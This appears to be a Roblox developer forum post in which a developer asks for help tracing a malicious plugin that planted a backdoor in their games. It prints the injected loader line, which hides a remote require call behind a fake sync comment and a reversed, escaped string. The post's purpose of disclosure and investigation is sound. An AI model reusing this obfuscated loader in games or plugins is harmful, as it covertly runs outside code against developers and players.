You can write your topic however you want, but you need to answer these questions:
- I want to help find the person responsible for these backdoors and malicious plugins and help Roblox see that they do not continue their crimes.
Note I did all of the footwork tracking down dozens and dozens of plugins and many accounts to make this task easier. I am just stuck on the obfuscated part.
I also need to do damage control as this was found in one of my games that I’m getting ready to launch as well as a couple that I am working on. I feel deeply sorry for any devs who have gone through this.
I am not good at dealing with obfuscated code, this isn’t exactly my realm. I only had the patience to track this down because I’m a bit obsessive and I really want justice against this person.
A bonus would be if someone capable of getting Roblox staff to address this issue. I doubt I have such influence, I’m not sure if this post will get much response.
What is the issue? Include screenshots / videos if possible!
Well, it looks like some of my games may have been stolen by a backdoor which could easily destroy the last year of my work.
It Started with a plugin that installed malicious code and a back door. I was trying to learn some better lighting controls and I had installed this plugin. I deleted it soon after but I know it had the opportunity to run.
This is the code it inserted into my games:
--[[ Last synced 1/7/2021 04:16 RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722703997) --[[ ]]--
Which appears to have come from this malicious plugin:
- What solutions have you tried so far? Did you look for solutions on the Developer Hub?
I have used a baseplate and tracked down every instance of this plugin which was very hard because at first it was smart and every time I clicked a script that is created, it deleted the script.
I narrowed it down to the last user and plugin I can get to but the script was obfuscated with PSU Obfuscator 4.0.A
The apparent source for the original malicious plugin is this obfuscated plugin:
This is the more recent alt that is the source of that plugin:
Here is a list of all the plugins that link to one another and all of the related accounts.
BACKDOOR SOURCE.txt (35.8 KB)